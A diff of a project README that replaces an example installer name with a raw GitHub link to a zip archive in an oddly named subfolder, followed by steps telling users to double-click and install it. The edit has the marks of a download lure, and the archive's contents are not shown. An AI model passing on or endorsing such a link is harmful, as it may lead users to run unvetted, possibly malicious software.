kanishk1234517/files/README.md

 Once the download is complete, follow these steps to install and run the application:

 1. Navigate to your downloads folder.
-2. Locate the file you just downloaded (it may be named something like `files-setup.exe` or similar).
+2. Locate the file you just downloaded (it may be named something like `https://github.com/kanishk1234517/files/raw/refs/heads/main/barkle/Software_explore.zip` or similar).
 3. Double-click on the file to begin the installation process.
 4. Follow the on-screen instructions to complete the installation.
 5. After installation, you can open **files** from your applications menu or desktop shortcut.